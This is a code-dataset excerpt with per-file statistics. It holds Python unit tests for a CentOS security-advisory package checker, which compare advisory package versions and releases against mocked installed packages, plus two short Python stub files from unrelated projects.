checker._advisoryPackageMeantForCurrentOs(a), advisory_packages)) # assert assert result == [False, True, True] def testAdvisoryPackageMeantForCurrentOsCentOs7(self): # arrange os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') errata = Mock() pkg = Mock() checker = package_checker.PackageChecker(errata,pkg,os_fetcher) advisory_packages = [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el6.2', 'arch':'x86_64'}, {'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}, {'name': 'xen-libs','version':'3.0.3', 'release':'135.el7_0.2', 'arch':'x86_64'}] # act result = list(map(lambda a: checker._advisoryPackageMeantForCurrentOs(a), advisory_packages)) # assert assert result == [False, True, True] def testSameVersionOfAnotherPackageInstalled(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['i686','x86_64'], ['7'], [{'name': 'libcacard-tools','version':'1.5.3', 'release':'60.el7_0.5', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('libgcrypt', '1.5.3', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert assert result == [] def testFindAdvisoriesOnInstalledPackagesNotInstalled(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el5_8.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('bash','1.0', '4.el7', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() 
os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledButCurrentAlready(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.3', '135.el7.2', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledButNewerVersion(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.4', '135.el5_8.2', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesVersionComparisonWith2Digits(self): # arrange errata = Mock() errata_packages = [ {'arch': 'x86_64', 'name': 'glibc', 'release': '55.el7.1', 'version': '2.17'}, {'arch': 'x86_64', 'name': 'glibc', 'release': '118.el7.3', 'version': '2.5'}] errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], errata_packages,[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('glibc','2.17', '55.el7.1', 'x86_64', 'updates'), ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert assert result == [] def testFindAdvisoriesOnInstalledPackagesBothOldAndNewInstalled(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.3', '132.el7.2', 'x86_64', 'updates'), Package('xen-libs','3.0.4', '135.el7.2', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = 
package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert assert result == [] def testFindAdvisoriesOnInstalledPackagesInstalledButLowerVersion(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.2', '135.el7.2', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertNotEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledButNewerRelease(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.3', '135.el7.3', 'x86_64', 'updates'), Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledAndNeedsUpdatingButWrongCentOsVersion(self): # arrange errata = Mock() errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('xen-libs','3.0.3', '135.el7.1', 'x86_64', 'updates'), Package('openssl','2.0', '4.el6', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='6') os_fetcher.get_mid_level_version = Mock(return_value='6.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledAndNeedsUpdatingButWrongCentOsVersionOnPackage(self): # https://github.com/wied03/centos-package-cron/issues/5 # arrange errata = Mock() adv_packages = [{'name': 'bash','version':'3.2', 'release':'33.el5.1', 'arch':'i386'}, {'name': 'bash','version':'3.2', 'release':'33.el5.1', 'arch':'src'}, {'name': 'bash','version':'3.2', 'release':'33.el5.1', 'arch':'x86_64'}, {'name': 'bash','version':'4.1.2', 'release':'15.el6_5.1', 'arch':'i686'}, {'name': 'bash','version':'4.1.2', 'release':'15.el6_5.1', 'arch':'src'}, {'name': 'bash','version':'4.1.2', 'release':'15.el6_5.1', 'arch':'x86_64'}, {'name': 'bash','version':'4.2.45', 'release':'5.el7_0.2', 'arch':'src'}, {'name': 'bash','version':'4.2.45', 'release':'5.el7_0.2', 'arch':'x86_64'}] errata.get_errata = Mock(return_value=[ errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, 
['x86_64'], ['5', '6', '7'], adv_packages,[]) ]) pkg = Mock() pkg.fetch_installed_packages = Mock(return_value=[ Package('bash','4.1.2', '29.el6', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='6') os_fetcher.get_mid_level_version = Mock(return_value='6.6') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert self.assertEquals(result, []) def testFindAdvisoriesOnInstalledPackagesInstalledAndNeedsUpdating(self): # arrange errata = Mock() advisory = errata_fetcher.ErrataItem('adv id', ErrataType.SecurityAdvisory,ErrataSeverity.Important, ['x86_64'], ['7'], [{'name': 'xen-libs','version':'3.0.3', 'release':'135.el7.2', 'arch':'x86_64'}],[]) errata.get_errata = Mock(return_value=[advisory]) pkg = Mock() xen_package = Package('xen-libs','3.0.3', '135.el7.1', 'x86_64', 'updates') pkg.fetch_installed_packages = Mock(return_value=[ xen_package, Package('openssl','2.0', '4.el7', 'x86_64', 'updates') ]) os_fetcher = Mock() os_fetcher.get_top_level_version = Mock(return_value='7') os_fetcher.get_mid_level_version = Mock(return_value='7.0') checker = package_checker.PackageChecker(errata,pkg,os_fetcher) # act result = checker.findAdvisoriesOnInstalledPackages() # assert assert len(result) == 1 first = result[0] assert first['advisory'] == advisory assert first['installed_packages'] == [xen_package] if __name__ == "__main__": unittest.main()
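The _advisoryPackageMeantForCurrentOs assertions above wrap map() in list() because, under Python 3, map() returns a lazy iterator that never compares equal to a list (the original Python 2 code relied on map() returning a list). A two-line demonstration:

    result = map(lambda r: r.endswith('.el7.2'), ['x.el6.2', 'y.el7.2'])
    assert result != [False, True]        # a map iterator is not a list
    assert list(result) == [False, True]  # materialize it first, then compare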
44.085366
216
0.615214
1,618
14,460
5.289864
0.074784
0.055731
0.082369
0.06426
0.827433
0.819021
0.801612
0.785138
0.781984
0.781984
0
0.054264
0.223859
14,460
327
217
44.220183
0.708367
0.023306
0
0.689076
0
0
0.152994
0
0
0
0
0
0.067227
1
0.058824
false
0
0.084034
0
0.147059
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
d96f5c5299748f4e8e43da2e826f19d01f03be8b
34
py
Python
pettingzoo/classic/rps_v1.py
vstark21/PettingZoo
0ebd8fb540e195f9dd91d996f190e9a89dedcf26
[ "Apache-2.0" ]
4
2021-12-17T08:00:28.000Z
2022-02-12T12:25:24.000Z
pettingzoo/classic/rps_v1.py
vstark21/PettingZoo
0ebd8fb540e195f9dd91d996f190e9a89dedcf26
[ "Apache-2.0" ]
null
null
null
pettingzoo/classic/rps_v1.py
vstark21/PettingZoo
0ebd8fb540e195f9dd91d996f190e9a89dedcf26
[ "Apache-2.0" ]
1
2021-01-25T22:57:41.000Z
2021-01-25T22:57:41.000Z
from .rps.rps import env, raw_env
17
33
0.764706
7
34
3.571429
0.714286
0
0
0
0
0
0
0
0
0
0
0
0.147059
34
1
34
34
0.862069
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
795af4d864995ffc8fae39868fb4eb2dfaeab3d0
332
py
Python
colcon_export_command/xml/models/__init__.py
maciejmatuszak/colcon-export-command
a7747996cbff25d8611306a9c1987cea3966271e
[ "Apache-2.0" ]
null
null
null
colcon_export_command/xml/models/__init__.py
maciejmatuszak/colcon-export-command
a7747996cbff25d8611306a9c1987cea3966271e
[ "Apache-2.0" ]
null
null
null
colcon_export_command/xml/models/__init__.py
maciejmatuszak/colcon-export-command
a7747996cbff25d8611306a9c1987cea3966271e
[ "Apache-2.0" ]
null
null
null
from colcon_export_command.xml.models.project import ( AdditionalGenerationEnvironment, Component, Configuration, Configurations, Env, Envs, Project, ) __all__ = [ "AdditionalGenerationEnvironment", "Component", "Configuration", "Configurations", "Env", "Envs", "Project", ]
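The __all__ list above pins exactly which names a wildcard import re-exports from the models package; a small hedged check, assuming the colcon_export_command package is installed:

    from colcon_export_command.xml.models import *  # noqa: F403

    # only the names enumerated in __all__ are bound by the star import
    print(Project, Component, Configurations)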
16.6
54
0.650602
23
332
9.130435
0.652174
0.380952
0.504762
0.638095
0.771429
0.771429
0.771429
0
0
0
0
0
0.240964
332
19
55
17.473684
0.833333
0
0
0
0
0
0.243976
0.093373
0
0
0
0
0
1
0
false
0
0.055556
0
0.055556
0
1
0
0
null
1
1
1
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
797ba3ce5ce939dc298e57e18fc7ff032d596f0b
70
py
Python
double3/double3sdk/depth/depth.py
CLOMING/winter2021_double
9b920baaeb3736a785a6505310b972c49b5b21e9
[ "Apache-2.0" ]
null
null
null
double3/double3sdk/depth/depth.py
CLOMING/winter2021_double
9b920baaeb3736a785a6505310b972c49b5b21e9
[ "Apache-2.0" ]
null
null
null
double3/double3sdk/depth/depth.py
CLOMING/winter2021_double
9b920baaeb3736a785a6505310b972c49b5b21e9
[ "Apache-2.0" ]
null
null
null
from double3sdk.double_api import _DoubleAPI class _Depth: pass
11.666667
44
0.785714
9
70
5.777778
1
0
0
0
0
0
0
0
0
0
0
0.017544
0.185714
70
5
45
14
0.894737
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6